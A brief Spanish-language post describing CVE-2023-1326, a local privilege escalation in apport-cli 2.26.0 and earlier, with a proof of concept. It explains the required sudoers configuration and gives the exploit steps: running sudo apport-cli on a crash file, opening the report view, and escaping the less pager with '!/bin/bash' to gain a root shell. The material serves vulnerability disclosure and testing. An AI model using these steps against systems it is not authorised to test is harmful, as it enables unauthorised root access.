
Una prueba de concepto para CVE-2023–1326 en apport-cli 2.26.0
Una prueba de concepto para CVE-2023–1326 en apport-cli 2.26.0
Esta vulnerabilidad es una escalada de privilegios en apport-cli 2.26.0, similar a CVE-2023–26604, esta vulnerabilidad solo funciona si está asignada en sudoers:

Se encontró un ataque de escalada de privilegios en apport-cli 2.26.0 y anteriores, similar a CVE-2023-26604. Si un sistema está especialmente configurado para permitir que usuarios no privilegiados ejecuten sudo apport-cli, less está configurado como paginador y se puede establecer el tamaño de la terminal: un atacante local puede escalar privilegios.
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
